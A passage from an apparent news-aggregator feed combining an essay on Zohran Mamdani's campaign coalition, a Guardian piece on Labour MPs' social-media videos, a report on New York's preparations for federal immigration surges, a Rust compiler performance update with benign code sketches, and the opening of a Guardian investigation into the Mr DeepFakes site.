, in which Mamdani challenged Homan over the illegal detention of Palestinian solidarity activist Mahmoud Khalil, circulated widely on social media and in immigrant communities. All of this helped Mamdani link his economic program with opposition to the president’s authoritarian lurch. In doing so, he appealed to immigrant voters worried about both ICE raids and making the rent, as well as voters who want their representatives to stand up to masked federal agents snatching people off the streets and whisking them away in unmarked cars. Moreover, Mamdani’s identity as a Muslim of South Asian descent undoubtedly activated demobilized voters excited by the idea of seeing someone like them in Gracie Mansion. The historic turnout surge that swept Muslim and South Asian neighborhoods in the outer boroughs is inseparable from Mamdani’s faith, his cultural fluency, and his outspoken defense of fellow Muslims against the Cuomo campaign’s Islamophobic bigotry.
The New York City chapter of the Democratic Socialists of America (NYC-DSA) has received a lot of credit for Mamdani’s victory, and rightfully so. Mamdani is a DSA member, as are his chief of staff, field director, and other key advisers. The campaign’s field leads, who organized canvassing shifts, were disproportionately members (I co-led a weekly canvass in my Brooklyn neighborhood during the primary). But organizations rooted in South Asian and Muslim communities deserve their fair share of the credit, including Desis Rising Up and Moving (DRUM) Beats, the Muslim Democratic Club of New York, Bangladeshi Americans for Political Progress, and grassroots affinity groups like Pakistanis for Zohran and Bangladeshis for Zohran. The mobilization of these communities transformed the electorate and helped Mamdani offset Cuomo’s strength in neighborhoods that shifted sharply to the former governor in the general election.
There are nearly 1 million Muslims in New York, but until Mamdani’s campaign they were a sleeping giant in local politics. Roughly 350,000 Muslims were registered, but only 12 percent of registered Muslims turned out to vote in the 2021 mayoral election. Mamdani’s campaign turned this dynamic completely on its head. DRUM Beats, which has organizing bases in the Bronx, Brooklyn, and Queens spanning a range of South Asian and Indo-Caribbean diasporic communities, played a key role. Their organizers are committed and tenacious, and many of them are women. “We’re like a gang,” the group’s organizing director Kazi Fouzia
told a
Politico
reporter
last summer. “When we go to any shop, people just move aside and say, ‘Oh my god. The DRUM leaders are here. The DRUM women are here.’” When Mamdani recognized “every New Yorker in Kensington and Midwood” in his victory speech, he had in mind the scores of aunties who ran themselves ragged knocking doors, sending texts, and making phone calls.
In their
post-election analysis
of the voting data, DRUM Beats detailed an enormous increase in turnout in the communities they organize. Based on Board of Elections data and their own models, they estimated that from 2021 to 2025 South Asian turnout exploded from 15.3 percent to nearly 43 percent, while Muslim turnout went from barely 15 percent to over 34 percent. While representing just 7 percent of New York’s registered voters, they accounted for an estimated 15 percent of actual voters in the general election. Nearly half of the city’s registered Bangladeshi and Pakistani American voters participated in the election, outpacing the overall participation rate of roughly 42 percent. This historic development didn’t materialize out of thin air. Mamdani’s faith, identity, and raw talent certainly didn’t hurt, but people on the ground have been quietly building civic infrastructure in these neighborhoods. In his assessment of the South Asian surge, electoral strategist Waleed Shahid noted that the places with the biggest gains were precisely “the places where DRUM Beats and allied organizers have spent years knocking doors, translating ballot measures, convening tenant meetings in basement prayer rooms, and building lists through WhatsApp groups and WhatsApp rumors alike.” I had the good fortune of getting to know some of these organizers during the campaign. Their capacity to mobilize working-class immigrants who had been overlooked for too long is formidable, and Mamdani’s victory cannot be explained without it.
Mamdani claimed the legacy of Fiorello La Guardia and Vito Marcantonio in the campaign’s final days, and the historical resonances ran deep. Shahid drew a parallel between the current moment and earlier realignments in the city’s political history “when groups written off as threatening or foreign became disciplined voting blocs: Irish Catholics moving from despised outsiders to Tammany’s core; Jewish and Italian workers turning the Lower East Side into a labor/socialist stronghold.” I am a product of New York’s twentieth-century Italian American diaspora myself. In rooms full of South Asian aunties for Zohran, wearing headscarves and plying everyone with plates of food, I saw people who in a different time could have been my own relatives stumping for the Little Flower, the legendary figure who was once told New York wasn’t ready for an Italian mayor. Turns out it was ready for an Italian mayor then, and it’s ready for a Muslim mayor now.
A Test for Partyism
Donald Trump’s return to the presidency set off a war of white papers on Democratic Party electoral strategy that shows few signs of a ceasefire. There are a variety of strategic prescriptions, but many of them fall into two broad and infelicitously named camps: popularists and deliverists. Popularists tend to hail from the party’s moderate wing, but not always. There is a leftist variety of popularism, for example, that finds expression in projects like the Center for Working-Class Politics. Ezra Klein has offered perhaps the clearest definition of the popularist persuasion: “Democrats should do a lot of polling to figure out which of their views are popular and which are not popular, and then they should talk about the popular stuff and shut up about the unpopular stuff.” Deliverism, by contrast, focuses less on campaigning and more on governing. As Matt Stoller summarized it in a tweet: “deliver and it helps you win elections. Don’t deliver and you lose.” When Democrats are in power, they should implement bold policies that improve people’s lives and then reap the rewards from a satisfied electorate.
There is an element of “duh, of course” to both schools of thought, but the weaknesses are easy to spot. Popularism seeks to mirror the current state of public opinion for the sake of electoral success, but public opinion is malleable and sometimes quite fickle. One need only look at the wildly fluctuating data on immigration attitudes since the 2024 election to see how quickly chasing public opinion can become a fool’s errand. Deliverism, by contrast, presumes “a linear and direct relationship between economic policy and people’s political allegiances,” as Deepak Bhargava, Shahrzad Shams, and Harry Hanbury
put it
. But that’s not typically how real people operate. The Biden administration was, in many respects, an experiment in deliverism that failed to deliver. It implemented policies that brought tangible benefits to millions of people but still couldn’t prevent Trump from returning to the White House.
The limitations of both popularism and deliverism have opened space for a new school of thought, one that tackles strategic electoral questions from a different angle (but also has a terrible name): partyism. The political scientist Henry Farrell has
usefully summarized
its premises: the Democratic Party’s fundamental problem is not its ideological positioning but the fact that it’s not a political party in any real sense. “If Democrats want to succeed,” Farrell writes, they need to “build up the Democratic party as a coherent organization that connects leaders to ordinary people.” In their book
The Hollow Parties
, Daniel Schlozman and Sam Rosenfeld trace how the Democratic and Republican parties alike have been transformed into rival “blobs” of consultants, donors, strategists, and interest groups. Their critique has been influential, and it has informed a spate of proposals for turning the Democratic Party into a network of civic institutions that engages voters between elections and mediates effectively between leaders and the base.
The Mamdani campaign was arguably the first major test of the partyist approach in practice. While there is no indication that campaign leaders and strategists consciously appropriated these ideas, it is not difficult to see the affinities between them. The campaign brought new and disengaged voters into the fold through novel activities like the scavenger hunt and the Cost of Living Classic, a citywide soccer tournament held in Coney Island. Its sinew and muscle came not from TikTok or Instagram, but from rooted civic organizations like NYC-DSA, DRUM Beats, United Auto Workers Region 9A, and the mosques, synagogues, and churches that opened their doors to the candidate. Even four of the five Democratic Party county committees in the city endorsed him, despite their historic wariness of insurgent candidates from the democratic socialist left (only the Queens county committee, a stronghold of dead-end Cuomo supporters, snubbed him). Mamdani’s victory was based, to a significant extent, on organizations with real members who engage in meaningful civic and political activity.
Of all the organizations listed above, however, the least important by far are the official bodies of the Democratic Party. The Mamdani campaign may have embodied an emergent partyist politics, but this is a partyism without the party. NYC-DSA’s electoral strategy, for example, is grounded in the concept of the “party surrogate” first proposed by
Jacobin
’s Seth Ackerman and developed further by the political scientist Adam Hilton and others. Given the daunting odds of successfully establishing any new party,
Hilton proposes
a network of chapter-based organizations “oriented toward building a base within working-class communities and labor unions that can also act as an effective independent pressure group on the Democratic Party.” This is precisely what Mamdani and other socialist candidates have done. Primary voters—not party organizations—decide candidate nominations, which radically reduces the incentives for transforming those organizations. Why fill in the hollow parties when you can do much the same thing outside of them?
For now, at least, partyist projects like the one that catapulted Mamdani into political stardom will continue to gestate outside of any formal party organization. The NYC-DSA chapter has doubled in size to 13,000 members since 2024, and that number will likely continue to grow. Organizers have established a new organization called Our Time that is focused on mobilizing campaign volunteers in support of Mamdani’s agenda after he is sworn into office. NYC-DSA, DRUM Beats, labor unions, tenant groups, and other organizations that endorsed Mamdani during the campaign have established a formal coalition called the People’s Majority Alliance to do much the same thing at the organizational leadership level. So it seems unlikely that Mamdani’s coalition will demobilize the way Barack Obama’s did after 2008. These are independent organizations, constituted outside of official Democratic Party institutions, that assume the base-building and mobilization functions a party would carry out directly in most other political systems. This is the form popular and participatory politics takes in the age of hollow parties, raising the possibility that a lost culture once sustained by precinct captains, ward heelers, and saloon keepers could be reborn in a new way.
Rolling back MAGA will require speaking to popular needs and aspirations and delivering on them. It will also require developing our capacities to work together in a spirit of democratic cooperation and public exuberance. The Mamdani campaign laid the foundations for this in one city, but here and elsewhere much more reconstruction remains to be done.
[
Chris Maisano
is a trade unionist and Democratic Socialists of America activist. He lives in Brooklyn, New York.]
TIL: Subtests in pytest 9.0.0+
Simon Willison
simonwillison.net
2025-12-05 06:03:29
TIL: Subtests in pytest 9.0.0+
I spotted an interesting new feature in the release notes for pytest 9.0.0: subtests.
I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful...
Explaining UK debt with biscuits: Labour MPs get the hang of viral content
Guardian
www.theguardian.com
2025-12-05 06:00:40
Gordon McKee, whose explainer has racked up 3m views, leads way as party tries to harness power of social mediaUK politics live – latest updatesA perennial head-scratcher for progressives is how to craft a simple, compelling message on the economy. One Labour MP found the answer in a few packets of ...
A perennial head-scratcher for progressives is how to craft a simple, compelling message on the economy. One
Labour
MP found the answer in a few packets of M&S biscuits.
Gordon McKee, who represents Glasgow South, has
racked up more than 3.3m views on X
with a 101-second video in which he demonstrates the UK’s debt to GDP ratio using stacks of custard creams and chocolate bourbons.
It may not seem like a major feat when several of the world’s most impactful politicians – Donald Trump, Nigel Farage and Zohran Mamdani among them – have used sleekly produced short-form videos to spread their campaign messages with considerable success.
But in the parliamentary Labour party McKee is a pioneer, and the only backbencher known to have hired a digital content creator.
The decision has paid off, with a series of professional-grade videos using grabby analogies designed to go viral. In recent weeks a few of his colleagues have begun to emulate him, including the Leeds East MP Richard Burgon.
“I feel like I should apologise for having started this!” McKee joked – before arguing that digital comms and campaigning was now essential for politicians.
He said he aimed to produce a couple of such videos a week and was focused on
Instagram
, TikTok and YouTube Shorts, which unlike X reach audiences beyond the politically hyper-engaged.
“I spoke at a high school in my constituency last week and I asked how many people read a newspaper every day – one put their hand up. When I asked how many are on Instagram, they all did,” he said.
“The way people consume information has changed enormously in the last 10 years but the way politicians and MPs communicate with their constituents hasn’t as much.”
There are signs that the Labour party machine is cranking into gear. Keir Starmer emailed Labour MPs on 21 November announcing a “significant investment” from the party in a “new comprehensive training programme” in digital campaigning.
Internally, the party has unveiled what it calls “Operation Second Term” to modernise its campaign operation – using social media and an app called Labour One – on the basis that “the way we campaigned in 2024 won’t be how we win again in 2029”.
MPs are also increasingly taking the initiative. Burgon used 200 packets of Sainsbury’s fusilli
to demonstrate
just how much £1bn is compared with the average UK salary of £33,000. His video has garnered nearly 650,000 views on X.
“I was going around the church fairs in the constituency this weekend – it was amazing how many people had seen the video,” Burgon said. “I’ve been campaigning for a wealth tax for a while and it seemed a fun way of communicating that.”
The 106kg mountain of pasta, which Burgon’s parliamentary researcher bought the weekend before last, could not feasibly be transported to Leeds and so has been donated to food banks in London.
Jeevun Sandher, the MP for Loughborough and an economist,
made a James Bond-themed video during budget week
explaining the various factors that affect government bond rates. “I’d love it if people read my 2,000-word essays but they don’t. You have to find a way of being engaging,” he said.
He relies on his existing team of parliamentary staffers – armed with a smartphone and ring-light mounted on to a tripod in the corner of his office – to produce online content.
Social media
planning is part of his office’s regular weekly catchup meeting.
Asked whether the government should be doing more to encourage MPs to modernise their communication, Sandher said that would risk becoming too regimented.
“It works quite well when it’s more organic and people understand what the government’s message is and take it on in different ways,” he said. “When you have a unified vision, everyone should be able to read off that script.”
Several junior ministers are also experimenting with social media, including the Treasury exchequer secretary, Dan Tomlinson, who filmed a chatty pre-budget clip on his way to Greggs for a doughnut at
Westminster tube station
, and the AI minister Kanishka Narayan who
shot a video on his iPhone
about the technology’s growth in the UK.
Some of the cabinet are also getting involved – Steve Reed, the housing secretary, did an “ask me anything” session on Reddit about a policy to reopen local pubs in September, and Ed Miliband, the energy secretary, who is a longtime vertical video enthusiast,
used ASMR to promote a government announcement
on small modular reactors (SMR).
“During the general election we had a big old team to support people doing this stuff and now they’re having to do that within their own offices,” said a Labour source. “It’s harder when you’re not attacking and instead having to defend and make a positive story about something, which is why you’ve got to be even more creative. It’s a difficult skill to learn but it’s an absolutely essential one.”
McKee argued that the challenge was especially acute for the left because rightwingers such as Farage and Robert Jenrick, the shadow justice secretary, are skilful at communicating very clear and simple stories on and off social media.
“The task from progressives is to articulate a complex argument that is realistic and ambitious but also real and deliverable – and to do that in an interesting, engaging way,” he said.
When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation
Portside
portside.org
2025-12-05 05:37:41
When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation
Jackie Bray has been thinking about how quickly things could spiral out of control.
Bray is the New York state emergency leader whom Gov. Kathy Hochul tasked with averting a Chicago or Los Angeles-style surge of immigration agents and National Guard troops. At the core of the job is a dilemma that the Trump administration has imposed on blue cities and states around the country: How can the state respond to aggressive, spectacle-driven immigration operations without triggering the showdown with federal agents that the administration is trying to provoke?
It’s a problem made all the more acute by how heavily some of the operations have been geared towards attracting attention, and by the way they have shifted away from immigration enforcement and towards repressing the protests that follow.
The result, state officials say, is a split approach. New York will fight to delay and block any federal deployment of the National Guard. But when it comes to surges of immigration enforcement officers, the plan is restraint: state and local police will act as buffers between federal agents and protestors, doing what they can to control crowds and de-escalate.
Glimpses of that strategy have already started to emerge. NYPD Commissioner Jessica Tisch
reportedly
got a heads-up about a high-profile October immigration raid on Manhattan’s Canal Street from the Trump administration; the Daily News reported that she directed officers to steer clear of the area. At a protest in late November, local police
placed barricades
between demonstrators and a group of Immigration and Customs Enforcement and Border Patrol officers who the activists had surrounded in a parking garage.
The approach has already led to criticism that the state is accommodating, and not fighting, what many regard as an increasingly harrowing example of authoritarianism. State officials respond that their approach is necessary to stop events from spiraling into the kind of escalation that could justify more federal deployments.
“I feel very lucky to not be an elected leader right now,” Bray told TPM.
Outreach
Gov. Kathy Hochul (D) directed Bray, a political appointee serving as director of New York State Division of Homeland Security and Emergency Services, over the summer to work out a plan that would avert the kind of splashy, violent federal presence that overtook Chicago, Los Angeles, and other cities.
For prevention, one model stands out: San Francisco.
There, Silicon Valley executives, along with Mayor Daniel Lurie (D), pleaded with Trump. They argued that a deployment would damage the economy. He replied by calling it off: “Friends of mine who live in the area called last night to ask me not to go forward with the surge,” he wrote on Truth Social.
That’s the plan that New York officials are trying to implement. They’ve convened groups of Wall Street leaders (Bray declined to say whether any had spoken to White House officials); both Hochul and New York City mayor-elect Zohran Mamdani have spoken with Trump directly.
Those meetings have resulted in something less than an adversarial relationship. As Trump shepherded Mamdani through an Oval Office press conference last month, the mayor-elect emphasized areas where the city and federal government could work together.
There are other
benefits that the state can provide
Trump, whose family business is still deeply rooted in New York. This week, a state gambling board
approved
licenses for three proposed casinos: one of them is set to be built on a golf course that belonged to the President. The move will net the Trump Organization $115 million.
Chicago and LA warnings
The deployments in Chicago and Los Angeles brought a level of brutality that, at first, helped to obscure their real aim.
The Trump administration cast them as immigration enforcement efforts, albeit with a new level of aggression. But after the White House used local, minor incidents of violence to justify sending troops in, the ICE and CBP operations started to strike observers as pretexts to stage larger-scale repression.
That prompted organizing between cities and states that had experienced the deployments and those that were next. New York’s Communications Workers of America organized one call in September titled “Learning From Chicago and LA and Preparing for Federal Escalation,” between elected officials in New York, Illinois, California, and elsewhere.
“We were just cautioning people to not lose the messaging war,” Hugo Martinez, a Los Angeles city councilmember on the call, told TPM. He said that the administration was seeking grounds to escalate, and that community leaders needed to “try to have as much control as possible over the response that the community has.”
Byron Sigcho-Lopez, a Chicago alderman, was on the call as well.
He took the message to heart. His community, Chicago’s Little Village, became an epicenter of CBP operations. One
video
that Sigcho-Lopez recorded of an October encounter with Border Patrol commander Gregory Bovino demonstrates how he internalized the approach: at several points, when demonstrators started to approach federal agents, Sigcho-Lopez would wave them off.
“They wanted to see escalation,” he told TPM last month.
Bray, the New York state commissioner, said that she had spoken to her counterparts in California and Illinois. For her, a few points became clear: litigation needed to start early. Local law enforcement needed to be prepared for the administration to direct federal authorities to stop communicating with them. Certain sites — like ICE detention facilities — became flashpoints.
Averted, but for how long?
The charm offensive has worked for now, state and city officials told TPM. But nobody can say how long that will last.
City officials are already taking some steps to prepare. The city sold a still-functional but out-of-use prison barge that was anchored near Rikers Island to a scrap company in Louisiana, removing 800 beds that the federal government could have seized for immigration enforcement. The city’s Economic Development Corporation, which is responsible for the project, declined to comment.
New York Attorney General Tish James’ office is preparing legal strategies and lawsuits to file that would challenge any National Guard deployment, one official told TPM.
Community organizers — some of whom have held calls with their counterparts in Chicago, LA, and elsewhere — are preparing as well.
They envision a campaign of resistance that will start with measures already in place, like flyers calling for people to report ICE and CBP operations. That information is then relayed to a network of people who can mobilize in response, organizing through messaging apps and staging spontaneous protests like one that appeared in Manhattan over the weekend and corralled federal agents for roughly two hours.
On the less risky end, that can mean mutual aid programs to provide legal and other forms of support. But some organizers also want to see more disruption. Jasmine Gripper, a state director of the Working Families Party, was on the call with local officials from LA and Chicago. Gripper told TPM that she envisioned a series of tactics that she described as “not letting ICE be at peace in our city.” That means persuading restaurant owners to refuse to serve immigration agents, following agents around with large bullhorns announcing their presence, and finding out where they’re staying and making loud noises at night.
“How do we disrupt at every level and have peaceful resistance and noncompliance to ICE being in our communities and what best can keep our folks safe?” she said.
Bray, the New York State emergency and homeland security commissioner, told TPM that she’s devoting around half of her schedule to trying to avert a federal escalation and to planning for one if it does happen.
The aggression in federal operations in Chicago shocked her, she said. Federal agents walked around in fatigues, masked and unidentified, as if they were an occupying foreign power. In one incident in Chicago, law enforcement rappelled from a helicopter into a dilapidated apartment building for a showy immigration raid.
“Why? Tell me what the strategic, tactical, operational, requirement for that is?” Bray asked.
It’s illegal to block federal agents from doing their job, Bray said. The overriding risk is that things spiral out of control. In California, federal law enforcement cut off communication with local cops as operations there ramped up. Bray told TPM that the state will do what it can to make sure that those lines of communication stay open, even when that means having police prevent demonstrators from blocking federal agents.
“You get images where people will say to me, ‘well, wait a second, look, isn’t that the NYPD helping?’ No, they’re not helping,” Bray said. “They’re doing crowd control. They’re making sure that there aren’t violent clashes in front of a government building. That’s their job. That’s not cooperation with feds. But, you know, this is gonna test us all.”
[Josh Kovensky
is an investigative reporter for Talking Points Memo, based in New York. He previously worked for the Kyiv Post in Ukraine, covering politics, business, and corruption there.
]
How to speed up the Rust compiler in December 2025
It has been more than six months since my last post on the Rust compiler’s performance. In that time I lost one job and gained another. I have less time to work directly on the Rust compiler than I used to, but I am still doing some stuff, while also working on other interesting things.
Compiler improvements
#142095
: The compiler has a
data structure called
VecCache
which is a key-value store used with keys that
are densely-numbered IDs, such as
CrateNum
or
LocalDefId
. It’s a segmented
vector with increasingly large buckets added as it grows. In this PR
Josh
Triplett
optimized the common case when the
key is in the first segment, which holds 4096 entries. This gave icount
reductions across many benchmark runs, beyond 4% in the best cases.
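To make the shape of that change concrete, here is a minimal, hypothetical sketch of a segmented store with a fast path for a fixed-size first segment. It is not rustc’s actual VecCache (which also handles concurrency and growth differently); it only illustrates why a lookup that hits the first segment is cheap.

```rust
/// A toy segmented key-value store indexed by dense integer IDs.
/// Illustration only -- not rustc's real `VecCache`.
const FIRST_SEGMENT_LEN: usize = 4096;

struct SegmentedCache<V> {
    /// The first segment is a plain vector: looking up a small key needs
    /// no segment arithmetic, which is the common case.
    first: Vec<Option<V>>,
    /// Later segments; the real structure uses increasingly large buckets,
    /// but fixed-size buckets keep this sketch simple.
    rest: Vec<Vec<Option<V>>>,
}

impl<V> SegmentedCache<V> {
    fn get(&self, key: usize) -> Option<&V> {
        if key < FIRST_SEGMENT_LEN {
            // Fast path: one bounds check and a direct index.
            self.first.get(key)?.as_ref()
        } else {
            // Slow path: map the key onto (segment, offset) first.
            let idx = key - FIRST_SEGMENT_LEN;
            let (seg, off) = (idx / FIRST_SEGMENT_LEN, idx % FIRST_SEGMENT_LEN);
            self.rest.get(seg)?.get(off)?.as_ref()
        }
    }
}
```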
#148040
: In this PR
Ben
Kimock
added a fast path for lowering trivial
consts. This reduced compile times for the
libc
crate by 5-15%! It’s unusual
to see a change that affects a single real-world crate so much, across all
compilation scenarios: debug and release, incremental and non-incremental.
This is a great result. At the time of writing,
libc
is the #12 most
popular crate on crates.io as measured by “recent downloads”, and #7 as
measured by “all-time downloads”. This change also reduced icounts for a few
other benchmarks by up to 10%.
#147293
: In the query system
there was a value computed on a hot path that was only used within a
debug!
call. In this PR I avoided doing that computation unless necessary, which gave
icount reductions across many benchmark results, more than 3% in the best case.
This was such a classic micro-optimization that I added it as an example to the Logging and Debugging chapter of The Rust Performance Book.
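The pattern is easy to introduce by accident, so it is worth spelling out. Here is a hypothetical sketch using the log crate (not the actual rustc code):

```rust
use log::{debug, log_enabled, Level};

/// Stand-in for a computation that is cheap to overlook in review
/// but costly on a hot path.
fn expensive_description(query: &str) -> String {
    query.chars().rev().collect()
}

fn hot_path(query: &str) {
    // Before: the value is computed unconditionally, even though it is
    // only ever read by the debug! call.
    //
    //     let desc = expensive_description(query);
    //     debug!("running query: {}", desc);

    // After: only do the work when debug logging is actually enabled.
    // (With the `log` crate, passing the call directly as a debug! argument
    // has a similar effect, since the macro checks the level before
    // evaluating its arguments; the explicit guard also covers any
    // multi-statement setup.)
    if log_enabled!(Level::Debug) {
        debug!("running query: {}", expensive_description(query));
    }
}
```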
#148706
: In this PR
dianne
optimized the handling of temporary scopes.
This reduced icounts on a number of benchmarks, 3% in the best case. It also
reduced peak memory usage on some of the secondary benchmarks containing very
large literals, by 5% in the best cases.
#143684
: In this PR
Nikita
Popov
upgraded the LLVM version used by the compiler
to LLVM 21. In recent years every LLVM update has improved the speed of the
Rust compiler. In this case the mean icount reduction across all benchmark
results was an excellent 1.70%, and the mean cycle count reduction was 0.90%, but the mean wall-time saw an increase of 0.26%.
Wall-time is the true metric, because it’s what users perceive, though it has
high variance. icounts and cycles usually correlate well to wall-time,
especially on large changes like this that affect many benchmarks, though this
case is a counter-example. I’m not quite sure what to make of it; I don’t know
whether the wall-time results on the test machine are representative.
#148789
: In this PR
Mara
Bos
reimplemented
format_args!()
and
fmt::Arguments
to be more space-efficient. This gave lots of small icount
wins, and a couple of enormous (30-38%) wins for the
large-workspace
stress
test. Mara wrote about this
on Mastodon. She also has written about prior work on formatting on her blog and in this tracking issue.
Lots of great reading there for people who love nitty-gritty optimization
details, including nice diagrams of how data structures are laid out in memory.
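For readers who have not poked at this corner of the standard library: format_args!() builds a fmt::Arguments value that describes a formatting job without allocating anything up front, and println!, write!, panic!, and friends are all built on top of it, which is why making the type smaller pays off so widely. A small example of the existing stable API (nothing here is specific to the new implementation):

```rust
use std::fmt;

// fmt::Arguments borrows its pieces, so it is normally consumed right away,
// for example by handing it to a formatting sink.
fn render(args: fmt::Arguments<'_>) -> String {
    // std::fmt::format turns the deferred description into an actual String.
    fmt::format(args)
}

fn main() {
    let answer = 42;
    // No String is allocated until `render` decides to format.
    let line = render(format_args!("the answer is {answer}"));
    assert_eq!(line, "the answer is 42");
    println!("{line}");
}
```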
Proc macro wins in Bevy
In June I
added
a new compiler flag
-Zmacro-stats
that measures how much code is generated by
macros. I
wrote
previously
about how I used it to optimize
#[derive(Arbitrary)]
from the
arbitrary
crate used for fuzzing.
I also used it to streamline the code generated by
#[derive(Reflect)]
in
Bevy
. This derive is used to implement reflection on many
types and it produced a
lot
of code. For example, the
bevy_ui
crate was
around 16,000 lines and 563,000 bytes of source code. The code generated by
#[derive(Reflect)]
for types within that crate was around 27,000 lines and
1,544,000 bytes. Macro expansion almost quadrupled the size of the code, mostly
because of this one macro!
After doing this I measured the
bevy_window
crate. The size of the code
generated by
#[derive(Reflect)]
was reduced by 39%, which reduced
cargo
check
wall-time for that crate by 16%, and peak memory usage by 5%. And there
are likely similar improvements across many other crates within Bevy, as well
as programs that use
#[derive(Reflect)]
themselves.
It’s understandable that the generated code was suboptimal. Proc macros aren’t
easy to write; there was previously no easy way to measure the size of the
generated code; and the generated code was considered good enough because (a)
it worked, and (b) the compiler would effectively optimize away all the
redundancies. But in general it is more efficient to optimize away redundancies
at the generation point, where context-specific and domain-specific information
is available, rather than relying on sophisticated optimization machinery
further down the compilation pipeline that has to reconstruct information. And
it’s just less code to parse and represent in memory.
rustdoc-json
At RustWeek 2025 I had a conversation with
Predrag
Gruevski
about
rustdoc-json
(invoked with the
--output-format=json
flag) and its effects on the performance of
cargo-semver-checks
. I spent
some time looking into it and found one nice win.
#142335
: In this PR I reduced
the number of allocations done by rustdoc-json. This gave wall-time reductions
of up to 10% and peak memory usage reductions of up to 8%.
I also tried various other things to improve rustdoc-json’s speed, without much
success. JSON is simple and easy to parse, and rustdoc-json’s schema for
representing Rust code is easy for humans to read. These features are great for
newcomers and people who want to experiment. It also means the JSON output is
space-inefficient, which limits the performance of heavy-duty tools like
cargo-semver-checks that are designed for large codebases. There are some
obvious space optimizations that could be applied to the JSON schema, like
shortening field names, omitting fields with default values, and interning
repeated strings. But these all affect its readability and flexibility.
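As a rough illustration of that trade-off, here is a hypothetical sketch using serde and serde_json, with made-up field names rather than rustdoc-json’s real schema: renaming fields and skipping empty optional fields shrinks the output considerably, at the cost of readability.

```rust
use serde::Serialize;

// Verbose, human-readable form.
#[derive(Serialize)]
struct ItemVerbose {
    name: String,
    visibility: String,
    deprecation: Option<String>,
}

// Compact form: short field names, and optional fields omitted when empty.
#[derive(Serialize)]
struct ItemCompact {
    #[serde(rename = "n")]
    name: String,
    #[serde(rename = "v")]
    visibility: String,
    #[serde(rename = "d", skip_serializing_if = "Option::is_none")]
    deprecation: Option<String>,
}

fn main() {
    let verbose = ItemVerbose { name: "foo".into(), visibility: "public".into(), deprecation: None };
    let compact = ItemCompact { name: "foo".into(), visibility: "public".into(), deprecation: None };
    // {"name":"foo","visibility":"public","deprecation":null}
    println!("{}", serde_json::to_string(&verbose).unwrap());
    // {"n":"foo","v":"public"}
    println!("{}", serde_json::to_string(&compact).unwrap());
}
```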
The right solution here is probably to introduce a performance-oriented second
format for the heavy-duty users.
#142642
is a draft attempt at
this. Hopefully progress can be made here in the future.
Faster compilation of large API crates
Josh Triplett introduced a new experimental flag,
-Zhint-mostly-unused
, which
can give big compile time wins for people using small fractions of very large
crates. This is typically the case for certain large API crates, such as
windows
,
rustix
, and
aws-sdk-ec2
. Read about it
here
.
Faster Rust builds on Mac
Did you know that macOS has a secret setting that can make Rust builds faster?
No joke!
General progress
Progress since May must be split into two parts, because in July we changed the machine
on which the measurements are done.
The first period (2025-05-20 to 2025-06-30) was on the old machine. The second period (2025-07-01 to 2025-12-03) was on the new machine.
The mean wall-time changes were moderate improvements (-3.19% and -2.65%). The
mean peak memory usage changes were a wash (+1.18% and -1.50%). The mean binary
size changes were small increases (0.45% and 2.56%).
It’s good that wall-times went down overall, even if the other metrics were
mixed. There is a slow but steady stream of bug fixes and new features to the
compiler, which often hurt performance. In the absence of active performance
work the natural tendency for a compiler is to get slower, so I view even small
improvements as a win.
The new machine reduced wall-times by about 20%. It’s worth upgrading your
hardware, if you can!
‘It was about degrading someone completely’: the story of Mr DeepFakes – the world’s most notorious AI porn site
Guardian
www.theguardian.com
2025-12-05 05:00:42
The hobbyists who helped build this site created technology that has been used to humiliate countless women. Why didn’t governments step in and stop them? For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a li...
For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a link, which took her to a site called Mr DeepFakes. There, she found fake images of herself, naked, squatting, chained, performing sex acts with various animals. They were tagged “Patrizia Schlosser sluty FUNK whore” (sic).
“They were very graphic, very humiliating,” says Schlosser, a German journalist for Norddeutscher Rundfunk (NDR) and
Funk
. “They were also very badly done, which made it easier to distance myself, and tell myself they were obviously fake. But it was very disturbing to imagine somebody somewhere spending hours on the internet searching for pictures of me, putting all this together.”
The site was new to Schlosser, despite her previous high-profile investigations into the porn industry. “I’d never heard of Mr DeepFakes – a porn site entirely dedicated to fake porn videos and photos. I was surprised by how big it was – so many videos of every celebrity you know.” Schlosser’s first reaction on seeing herself among them was to brush it aside. “I tried to push it to the back of my mind, which was really a strategy of not dealing with it,” she says. “But it’s strange how the brain works. You know it’s fake but still you see it. It’s not you but also it is you. There you are with a dog and a chain. You feel violated but confused. At some point, I decided: ‘No. I’m angry. I don’t want those images out there.’”
Schlosser’s subsequent documentary for NDR’s STRG_F programme did succeed in getting the images removed. She also tracked down the young man who had created and posted them – even visiting his home and speaking to his mother. (The perpetrator himself wouldn’t come out of his bedroom.) However, Schlosser was unable to identify “Mr DeepFakes” – or whoever was behind the site, despite enlisting the help of Bellingcat, the online investigative journalism collective. Bellingcat’s Ross Higgins was on the team. “My background is investigating money laundering,” he says. “I looked at the structure of the website and it was using the same internet service providers (ISPs) as proper serious organised criminals.” The ISPs suggested links to the Russian mercenary group Wagner, and individuals named in the
Panama Papers
. The ads it carried included ones for apps owned by Chinese technology companies, which allowed China’s government access to all customer data. “I made the presumption that this was all much too sophisticated to be a site of hobbyists,” says Higgins.
It turned out that’s exactly what it was.
The story of Mr DeepFakes, the world’s largest, most notorious nonconsensual deepfake porn site, is really the story of AI porn itself – the very term “deepfake” is believed to have come from its originator. A “ground zero” for AI-generated pornography, its pages – which have been viewed more than 2bn times – have depicted countless female celebrities, politicians, European princesses, wives and daughters of US presidents, being kidnapped, tortured, shaved, bound, mutilated, raped and strangled. Yet all this content (which would take more than 200 days to watch) was just the site’s “shop window”. Its true heart, its “engine room”, was its forum. Here, anyone wanting deepfakes created of someone they knew (a girlfriend, sister, classmate or colleague) could find someone willing to make them to order for the right price. It was also a “training ground”, a technical hub where “hobbyists” taught one another, shared tips, posted academic papers and “problem-solved”. (One recurring problem was how to deepfake without a good “dataset”. This means when you’re trying to deepfake someone you don’t have many pictures of – so not a celebrity, but maybe someone you know whose social media you’ve screengrabbed.)
